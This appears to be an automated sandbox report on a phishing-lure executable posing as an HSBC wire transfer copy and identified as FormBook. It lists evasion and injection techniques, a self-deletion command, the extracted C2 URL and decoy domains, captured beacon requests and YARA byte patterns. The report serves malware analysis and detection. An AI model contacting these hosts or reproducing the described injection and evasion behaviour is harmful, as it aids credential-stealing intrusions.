
Windows Analysis Report HSBC ... Wire Transfer Copy.exe

Overview

General Information

Sample Name: HSBC ... Wire Transfer Copy.exe
Analysis ID: 528773
MD5: 99b154970d15748d1df9025f675ecc76
SHA1: 75503611daf18643a401c2020ae9e045111b7f1f
SHA256: 13af03cd2db9c68bc397fd81f101287df005f27bc806737ffad390324a068d4c
Tags: exe, Formbook, HSBC

Detection

FormBook
Score: 100
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Found malware configuration
Multi AV Scanner detection for submitted file
Yara detected FormBook
Malicious sample detected (through community Yara rule)
Yara detected AntiVM3
System process connects to network (likely due to code injection or exploit)
Sample uses process hollowing technique
Maps a DLL or memory area into another process
Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)
Modifies the prolog of user mode functions (user mode inline hooks)
Self deletion via cmd delete
.NET source code contains potential unpacker
Queues an APC in another process (thread injection)
Tries to detect virtualization through RDTSC time measurements
Modifies the context of a thread in another process (thread injection)
C2 URLs / IPs found in malware configuration
Uses ipconfig to lookup or modify the Windows network settings
Uses 32bit PE files
Queries the volume information (name, serial number etc) of a device
Yara signature match
Antivirus or Machine Learning detection for unpacked file
May sleep (evasive loops) to hinder dynamic analysis
Uses code obfuscation techniques (call, push, ret)
Detected potential crypto function
Found potential string decryption / allocating functions
Sample execution stops while process was sleeping (likely an evasion)
Contains functionality to call native functions
HTTP GET or POST without a user agent
Contains functionality for execution timing, often used to detect debuggers
Contains long sleeps (>= 3 min)
Enables debug privileges
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found inlined nop instructions (likely shell or obfuscated code)
Sample file is different than original file name gathered from version info
Contains functionality to read the PEB
Checks if the current process is being debugged
Creates a process in suspended mode (likely to inject code)
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)

Classification

Process Tree

  • System is w10x64
  • HSBC ... Wire Transfer Copy.exe (PID: 6892 cmdline: "C:\Users\user\Desktop\HSBC ... Wire Transfer Copy.exe" MD5: 99B154970D15748D1DF9025F675ECC76)
    • HSBC ... Wire Transfer Copy.exe (PID: 7164 cmdline: C:\Users\user\Desktop\HSBC ... Wire Transfer Copy.exe MD5: 99B154970D15748D1DF9025F675ECC76)
      • explorer.exe (PID: 3352 cmdline: C:\Windows\Explorer.EXE MD5: AD5296B280E8F522A8A897C96BAB0E1D)
        • ipconfig.exe (PID: 6536 cmdline: C:\Windows\SysWOW64\ipconfig.exe MD5: B0C7423D02A007461C850CD0DFE09318)
          • cmd.exe (PID: 6672 cmdline: /c del "C:\Users\user\Desktop\HSBC ... Wire Transfer Copy.exe" MD5: F3BDBE3BB6F734E357235F4D5898582D)
            • conhost.exe (PID: 6888 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
  • cleanup

Malware Configuration

Threatname: FormBook

{"C2 list": ["www.atlantiscompania.com/m4n8/"], "decoy": ["loganvineyard.com", "seanna-charters.com", "ironbandfitness.com", "centuriesandsleuthsreviews.com", "saminicky2022.com", "oscarlorenzo.online", "donaldlittlelaw.com", "internetbook.net", "dailyhealthyfood.com", "kostarelosdair.com", "baodingtangyang.com", "cumberlndfarms.com", "dylanmellor.xyz", "investwithelsa.com", "dermaaesthetika.com", "shoelife864.com", "nightcosex.biz", "greauxbooks.com", "artwithnumber.com", "hyggestudio.store", "vektor-pro.com", "bookextraevents.com", "poweredsky.store", "carver150.com", "greenfleetshippingco.com", "raise-ryokwpl.xyz", "lobbiru.com", "tilcep.xyz", "frist-universe.com", "thehumanityleague.com", "zz4321.com", "rightpowereletricalservices.com", "alainasdesigns.com", "getcardanocoin.com", "wattnow.biz", "nitromaxfmx.com", "rty161578.top", "danielthan.com", "devjmccormick.com", "clearwaterwaverunners.com", "onlineames.com", "pureproducts.xyz", "yoothdirect.info", "tryprovo.com", "mkuu88888.xyz", "fibers2you.com", "urdnauha.xyz", "andfme.com", "shopkoman.com", "civico46bcn.com", "top-online-fashion-24.com", "lakshimechatronicssystems.com", "cortezphoto.com", "samallondemolitonyorkshire.com", "uang.exchange", "gonderipaylasim.net", "piramsgprodiet.store", "parasmountplus.com", "sifangav.net", "gramaltinrafineri.com", "kvb5676.com", "atomhome.xyz", "catproductreviews.com", "frenchieaday.com"]}

Yara Overview

Memory Dumps

Source | Rule | Description | Author | Strings
00000006.00000000.287427300.0000000000400000.00000040.00000001.sdmp | JoeSecurity_FormBook | Yara detected FormBook | Joe Security
00000006.00000000.287427300.0000000000400000.00000040.00000001.sdmp | Formbook_1 | autogenerated rule brought to you by yara-signator | Felix Bilstein - yara-signator at cocacoding dot com
  • 0x9908:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
  • 0x9b82:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
  • 0x156b5:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94
  • 0x151a1:$sequence_2: 3B 4F 14 73 95 85 C9 74 91
  • 0x157b7:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F
  • 0x1592f:$sequence_4: 5D C3 8D 50 7C 80 FA 07
  • 0xa59a:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06
  • 0x1441c:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8
  • 0xb293:$sequence_7: 66 89 0C 02 5B 8B E5 5D
  • 0x1b927:$sequence_8: 3C 54 74 04 3C 74 75 F4
  • 0x1c92a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
00000006.00000000.287427300.0000000000400000.00000040.00000001.sdmp | Formbook | detect Formbook in memory | JPCERT/CC Incident Response Group
  • 0x18849:$sqlite3step: 68 34 1C 7B E1
  • 0x1895c:$sqlite3step: 68 34 1C 7B E1
  • 0x18878:$sqlite3text: 68 38 2A 90 C5
  • 0x1899d:$sqlite3text: 68 38 2A 90 C5
  • 0x1888b:$sqlite3blob: 68 53 D8 7F 8C
  • 0x189b3:$sqlite3blob: 68 53 D8 7F 8C
00000010.00000002.547820066.0000000003380000.00000004.00000001.sdmp | JoeSecurity_FormBook | Yara detected FormBook | Joe Security
00000010.00000002.547820066.0000000003380000.00000004.00000001.sdmp | Formbook_1 | autogenerated rule brought to you by yara-signator | Felix Bilstein - yara-signator at cocacoding dot com
  • 0x9908:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
  • 0x9b82:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
  • 0x156b5:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94
  • 0x151a1:$sequence_2: 3B 4F 14 73 95 85 C9 74 91
  • 0x157b7:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F
  • 0x1592f:$sequence_4: 5D C3 8D 50 7C 80 FA 07
  • 0xa59a:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06
  • 0x1441c:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8
  • 0xb293:$sequence_7: 66 89 0C 02 5B 8B E5 5D
  • 0x1b927:$sequence_8: 3C 54 74 04 3C 74 75 F4
  • 0x1c92a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00

Unpacked PEs

Source | Rule | Description | Author | Strings
6.2.HSBC ... Wire Transfer Copy.exe.400000.0.unpack | JoeSecurity_FormBook | Yara detected FormBook | Joe Security
6.2.HSBC ... Wire Transfer Copy.exe.400000.0.unpack | Formbook_1 | autogenerated rule brought to you by yara-signator | Felix Bilstein - yara-signator at cocacoding dot com
  • 0x8b08:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
  • 0x8d82:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
  • 0x148b5:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94
  • 0x143a1:$sequence_2: 3B 4F 14 73 95 85 C9 74 91
  • 0x149b7:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F
  • 0x14b2f:$sequence_4: 5D C3 8D 50 7C 80 FA 07
  • 0x979a:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06
  • 0x1361c:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8
  • 0xa493:$sequence_7: 66 89 0C 02 5B 8B E5 5D
  • 0x1ab27:$sequence_8: 3C 54 74 04 3C 74 75 F4
  • 0x1bb2a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
6.2.HSBC ... Wire Transfer Copy.exe.400000.0.unpack | Formbook | detect Formbook in memory | JPCERT/CC Incident Response Group
  • 0x17a49:$sqlite3step: 68 34 1C 7B E1
  • 0x17b5c:$sqlite3step: 68 34 1C 7B E1
  • 0x17a78:$sqlite3text: 68 38 2A 90 C5
  • 0x17b9d:$sqlite3text: 68 38 2A 90 C5
  • 0x17a8b:$sqlite3blob: 68 53 D8 7F 8C
  • 0x17bb3:$sqlite3blob: 68 53 D8 7F 8C
6.0.HSBC ... Wire Transfer Copy.exe.400000.8.unpack | JoeSecurity_FormBook | Yara detected FormBook | Joe Security
6.0.HSBC ... Wire Transfer Copy.exe.400000.8.unpack | Formbook_1 | autogenerated rule brought to you by yara-signator | Felix Bilstein - yara-signator at cocacoding dot com
  • 0x8b08:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
  • 0x8d82:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
  • 0x148b5:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94
  • 0x143a1:$sequence_2: 3B 4F 14 73 95 85 C9 74 91
  • 0x149b7:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F
  • 0x14b2f:$sequence_4: 5D C3 8D 50 7C 80 FA 07
  • 0x979a:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06
  • 0x1361c:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8
  • 0xa493:$sequence_7: 66 89 0C 02 5B 8B E5 5D
  • 0x1ab27:$sequence_8: 3C 54 74 04 3C 74 75 F4
  • 0x1bb2a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00

Sigma Overview

No Sigma rule has matched

Jbx Signature Overview


AV Detection:

Found malware configuration
Source: 00000006.00000000.287427300.0000000000400000.00000040.00000001.sdmp, Malware Configuration Extractor: FormBook (the extracted configuration is the one listed under Malware Configuration above)
Multi AV Scanner detection for submitted file
Source: HSBC ... Wire Transfer Copy.exe, Virustotal: Detection: 16%
Source: HSBC ... Wire Transfer Copy.exe, ReversingLabs: Detection: 40%
Yara detected FormBook
Source: Yara match, File source: 6.2.HSBC ... Wire Transfer Copy.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match, File source: 6.0.HSBC ... Wire Transfer Copy.exe.400000.8.unpack, type: UNPACKEDPE
Source: Yara match, File source: 6.2.HSBC ... Wire Transfer Copy.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match, File source: 6.0.HSBC ... Wire Transfer Copy.exe.400000.6.unpack, type: UNPACKEDPE
Source: Yara match, File source: 6.0.HSBC ... Wire Transfer Copy.exe.400000.6.raw.unpack, type: UNPACKEDPE
Source: Yara match, File source: 6.0.HSBC ... Wire Transfer Copy.exe.400000.4.unpack, type: UNPACKEDPE
Source: Yara match, File source: 6.0.HSBC ... Wire Transfer Copy.exe.400000.8.raw.unpack, type: UNPACKEDPE
Source: Yara match, File source: 00000006.00000000.287427300.0000000000400000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match, File source: 00000010.00000002.547820066.0000000003380000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match, File source: 00000006.00000002.346806023.0000000001930000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match, File source: 00000010.00000002.547165223.0000000002C60000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match, File source: 00000006.00000002.345755031.0000000000400000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match, File source: 00000006.00000002.346832554.0000000001960000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match, File source: 00000000.00000002.290604348.0000000003AF1000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match, File source: 0000000C.00000000.322367188.000000000FC1F000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match, File source: 00000006.00000000.287940636.0000000000400000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match, File source: 00000010.00000002.547580773.0000000002DD0000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match, File source: 00000000.00000002.290259549.00000000038AD000.00000004.00000001.sdmp, type: MEMORY
Source: 6.2.HSBC ... Wire Transfer Copy.exe.400000.0.unpack, Avira: Label: TR/Crypt.ZPACK.Gen
Source: 6.0.HSBC ... Wire Transfer Copy.exe.400000.8.unpack, Avira: Label: TR/Crypt.ZPACK.Gen
Source: 6.0.HSBC ... Wire Transfer Copy.exe.400000.6.unpack, Avira: Label: TR/Crypt.ZPACK.Gen
Source: 6.0.HSBC ... Wire Transfer Copy.exe.400000.4.unpack, Avira: Label: TR/Crypt.ZPACK.Gen
Source: HSBC ... Wire Transfer Copy.exe, Static PE information: 32BIT_MACHINE, EXECUTABLE_IMAGE
Source: HSBC ... Wire Transfer Copy.exe, Static PE information: NO_SEH, TERMINAL_SERVER_AWARE, DYNAMIC_BASE, NX_COMPAT
Source: Binary string: ipconfig.pdb, source: HSBC ... Wire Transfer Copy.exe, 00000006.00000002.346858842.0000000001990000.00000040.00020000.sdmp
Source: Binary string: ipconfig.pdbGCTL, source: HSBC ... Wire Transfer Copy.exe, 00000006.00000002.346858842.0000000001990000.00000040.00020000.sdmp
Source: Binary string: wntdll.pdbUGP, source: HSBC ... Wire Transfer Copy.exe, 00000006.00000002.346567819.000000000171F000.00000040.00000001.sdmp, HSBC ... Wire Transfer Copy.exe, 00000006.00000002.346329666.0000000001600000.00000040.00000001.sdmp, ipconfig.exe, 00000010.00000002.548146108.0000000003620000.00000040.00000001.sdmp, ipconfig.exe, 00000010.00000002.549823291.000000000373F000.00000040.00000001.sdmp
Source: Binary string: wntdll.pdb, source: HSBC ... Wire Transfer Copy.exe, HSBC ... Wire Transfer Copy.exe, 00000006.00000002.346567819.000000000171F000.00000040.00000001.sdmp, HSBC ... Wire Transfer Copy.exe, 00000006.00000002.346329666.0000000001600000.00000040.00000001.sdmp, ipconfig.exe, ipconfig.exe, 00000010.00000002.548146108.0000000003620000.00000040.00000001.sdmp, ipconfig.exe, 00000010.00000002.549823291.000000000373F000.00000040.00000001.sdmp
Source: C:\Users\user\Desktop\HSBC ... Wire Transfer Copy.exe, Code function: 4x nop then pop edi
Source: C:\Windows\SysWOW64\ipconfig.exe, Code function: 4x nop then pop edi

Networking:

System process connects to network (likely due to code injection or exploit)
Source: C:\Windows\explorer.exe, Network Connect: 172.217.168.83 80
Source: C:\Windows\explorer.exe, Domain query: www.gramaltinrafineri.com
Source: C:\Windows\explorer.exe, Domain query: www.catproductreviews.com
Source: C:\Windows\explorer.exe, Domain query: www.piramsgprodiet.store
Source: C:\Windows\explorer.exe, Network Connect: 34.102.136.180 80
C2 URLs / IPs found in malware configuration
Source: Malware configuration extractor, URLs: www.atlantiscompania.com/m4n8/
Source: global traffic, HTTP traffic detected: GET /m4n8/?l0G=-Zrd9J1pqHLdHPo&5jblCF=tUrd37IHNwUNrKy1BA5QR6EUYG6BNHyAaYYkpUFqoPlzKT8wvvxP2/AQv7fSiFC9KSL+ HTTP/1.1; Host: www.piramsgprodiet.store; Connection: close; Data Raw: 00 00 00 00 00 00 00; Data Ascii:
Source: global traffic, HTTP traffic detected: GET /m4n8/?5jblCF=6FC/YAdxArGDbOG0ZU8ranLB3olQ8/HIU17UMwKJ54PfoS0z6/xA4+VoDBKhLnDEQ6+k&l0G=-Zrd9J1pqHLdHPo HTTP/1.1; Host: www.gramaltinrafineri.com; Connection: close; Data Raw: 00 00 00 00 00 00 00; Data Ascii:
Source: global traffic, HTTP traffic detected: GET /m4n8/?l0G=-Zrd9J1pqHLdHPo&5jblCF=fqwcloTwW+H6Usea82LuZckhsM6vXxH+7LRp9WPFBQLwjEJmVheIZ7PCXY+dS9vifeb6 HTTP/1.1; Host: www.catproductreviews.com; Connection: close; Data Raw: 00 00 00 00 00 00 00; Data Ascii:
Source: global traffic, HTTP traffic detected: HTTP/1.1 403 Forbidden; Server: openresty; Date: Thu, 25 Nov 2021 17:58:23 GMT; Content-Type: text/html; Content-Length: 275; ETag: "61973ffe-113"; Via: 1.1 google; Connection: close; Data Ascii: <!DOCTYPE html><html lang="en"><head> <meta http-equiv="content-type" content="text/html;charset=utf-8"> <link rel="shortcut icon" href="data:image/x-icon;," type="image/x-icon"> <title>Forbidden</title></head><body><h1>Access Forbidden</h1></body></html>
Source: global traffic, HTTP traffic detected: HTTP/1.1 403 Forbidden; Server: openresty; Date: Thu, 25 Nov 2021 17:58:43 GMT; Content-Type: text/html; Content-Length: 275; ETag: "61973ffe-113"; Via: 1.1 google; Connection: close; Data Ascii: <!DOCTYPE html><html lang="en"><head> <meta http-equiv="content-type" content="text/html;charset=utf-8"> <link rel="shortcut icon" href="data:image/x-icon;," type="image/x-icon"> <title>Forbidden</title></head><body><h1>Access Forbidden</h1></body></html>
Source: HSBC ... Wire Transfer Copy.exe, 00000000.00000002.289914483.00000000028A1000.00000004.00000001.sdmp, HSBC ... Wire Transfer Copy.exe, 00000000.00000002.290051006.000000000296B000.00000004.00000001.sdmp, String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
Source: ipconfig.exe, 00000010.00000002.551598331.000000000403F000.00000004.00020000.sdmp, String found in binary or memory: https://www.piramsgprodiet.store/m4n8/?l0G=-Zrd9J1pqHLdHPo&amp;5jblCF=tUrd37IHNwUNrKy1BA5QR6EUYG6BNH
Source: unknown, DNS traffic detected: queries for: www.piramsgprodiet.store
Source: global traffic, HTTP traffic detected: GET /m4n8/?l0G=-Zrd9J1pqHLdHPo&5jblCF=tUrd37IHNwUNrKy1BA5QR6EUYG6BNHyAaYYkpUFqoPlzKT8wvvxP2/AQv7fSiFC9KSL+ HTTP/1.1; Host: www.piramsgprodiet.store; Connection: close; Data Raw: 00 00 00 00 00 00 00; Data Ascii:
Source: global traffic, HTTP traffic detected: GET /m4n8/?5jblCF=6FC/YAdxArGDbOG0ZU8ranLB3olQ8/HIU17UMwKJ54PfoS0z6/xA4+VoDBKhLnDEQ6+k&l0G=-Zrd9J1pqHLdHPo HTTP/1.1; Host: www.gramaltinrafineri.com; Connection: close; Data Raw: 00 00 00 00 00 00 00; Data Ascii:
Source: global traffic, HTTP traffic detected: GET /m4n8/?l0G=-Zrd9J1pqHLdHPo&5jblCF=fqwcloTwW+H6Usea82LuZckhsM6vXxH+7LRp9WPFBQLwjEJmVheIZ7PCXY+dS9vifeb6 HTTP/1.1; Host: www.catproductreviews.com; Connection: close; Data Raw: 00 00 00 00 00 00 00; Data Ascii:

E-Banking Fraud:

Yara detected FormBook
Source: Yara match, File source: 6.2.HSBC ... Wire Transfer Copy.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match, File source: 6.0.HSBC ... Wire Transfer Copy.exe.400000.8.unpack, type: UNPACKEDPE
Source: Yara match, File source: 6.2.HSBC ... Wire Transfer Copy.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match, File source: 6.0.HSBC ... Wire Transfer Copy.exe.400000.6.unpack, type: UNPACKEDPE
Source: Yara match, File source: 6.0.HSBC ... Wire Transfer Copy.exe.400000.6.raw.unpack, type: UNPACKEDPE
Source: Yara match, File source: 6.0.HSBC ... Wire Transfer Copy.exe.400000.4.unpack, type: UNPACKEDPE
Source: Yara match, File source: 6.0.HSBC ... Wire Transfer Copy.exe.400000.8.raw.unpack, type: UNPACKEDPE
Source: Yara match, File source: 00000006.00000000.287427300.0000000000400000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match, File source: 00000010.00000002.547820066.0000000003380000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match, File source: 00000006.00000002.346806023.0000000001930000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match, File source: 00000010.00000002.547165223.0000000002C60000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match, File source: 00000006.00000002.345755031.0000000000400000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match, File source: 00000006.00000002.346832554.0000000001960000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match, File source: 00000000.00000002.290604348.0000000003AF1000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match, File source: 0000000C.00000000.322367188.000000000FC1F000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match, File source: 00000006.00000000.287940636.0000000000400000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match, File source: 00000010.00000002.547580773.0000000002DD0000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match, File source: 00000000.00000002.290259549.00000000038AD000.00000004.00000001.sdmp, type: MEMORY

          System Summary:

          barindex
          Malicious sample detected (through community Yara rule)Show sources
          Source: 6.2.HSBC ... Wire Transfer Copy.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 6.2.HSBC ... Wire Transfer Copy.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 6.0.HSBC ... Wire Transfer Copy.exe.400000.8.unpack, type: UNPACKEDPEMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 6.0.HSBC ... Wire Transfer Copy.exe.400000.8.unpack, type: UNPACKEDPEMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 6.2.HSBC ... Wire Transfer Copy.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 6.2.HSBC ... Wire Transfer Copy.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 6.0.HSBC ... Wire Transfer Copy.exe.400000.6.unpack, type: UNPACKEDPEMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 6.0.HSBC ... Wire Transfer Copy.exe.400000.6.unpack, type: UNPACKEDPEMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 6.0.HSBC ... Wire Transfer Copy.exe.400000.6.raw.unpack, type: UNPACKEDPEMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 6.0.HSBC ... Wire Transfer Copy.exe.400000.6.raw.unpack, type: UNPACKEDPEMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 6.0.HSBC ... Wire Transfer Copy.exe.400000.4.unpack, type: UNPACKEDPEMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 6.0.HSBC ... Wire Transfer Copy.exe.400000.4.unpack, type: UNPACKEDPEMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 6.0.HSBC ... Wire Transfer Copy.exe.400000.8.raw.unpack, type: UNPACKEDPEMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 6.0.HSBC ... Wire Transfer Copy.exe.400000.8.raw.unpack, type: UNPACKEDPEMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 00000006.00000000.287427300.0000000000400000.00000040.00000001.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000006.00000000.287427300.0000000000400000.00000040.00000001.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 00000010.00000002.547820066.0000000003380000.00000004.00000001.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000010.00000002.547820066.0000000003380000.00000004.00000001.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 00000006.00000002.346806023.0000000001930000.00000040.00020000.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000006.00000002.346806023.0000000001930000.00000040.00020000.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 00000010.00000002.547165223.0000000002C60000.00000040.00020000.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000010.00000002.547165223.0000000002C60000.00000040.00020000.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 00000006.00000002.345755031.0000000000400000.00000040.00000001.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000006.00000002.345755031.0000000000400000.00000040.00000001.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 00000006.00000002.346832554.0000000001960000.00000040.00020000.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000006.00000002.346832554.0000000001960000.00000040.00020000.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 00000000.00000002.290604348.0000000003AF1000.00000004.00000001.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000000.00000002.290604348.0000000003AF1000.00000004.00000001.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 0000000C.00000000.322367188.000000000FC1F000.00000040.00020000.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 0000000C.00000000.322367188.000000000FC1F000.00000040.00020000.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 00000006.00000000.287940636.0000000000400000.00000040.00000001.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000006.00000000.287940636.0000000000400000.00000040.00000001.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 00000010.00000002.547580773.0000000002DD0000.00000040.00020000.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000010.00000002.547580773.0000000002DD0000.00000040.00020000.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 00000000.00000002.290259549.00000000038AD000.00000004.00000001.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000000.00000002.290259549.00000000038AD000.00000004.00000001.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: HSBC ... Wire Transfer Copy.exeStatic PE information: 32BIT_MACHINE, EXECUTABLE_IMAGE
          Source: 6.2.HSBC ... Wire Transfer Copy.exe.400000.0.unpack, type: UNPACKEDPE | Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 6.2.HSBC ... Wire Transfer Copy.exe.400000.0.unpack, type: UNPACKEDPE | Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 6.0.HSBC ... Wire Transfer Copy.exe.400000.8.unpack, type: UNPACKEDPE | Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 6.0.HSBC ... Wire Transfer Copy.exe.400000.8.unpack, type: UNPACKEDPE | Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 6.2.HSBC ... Wire Transfer Copy.exe.400000.0.raw.unpack, type: UNPACKEDPE | Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 6.2.HSBC ... Wire Transfer Copy.exe.400000.0.raw.unpack, type: UNPACKEDPE | Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
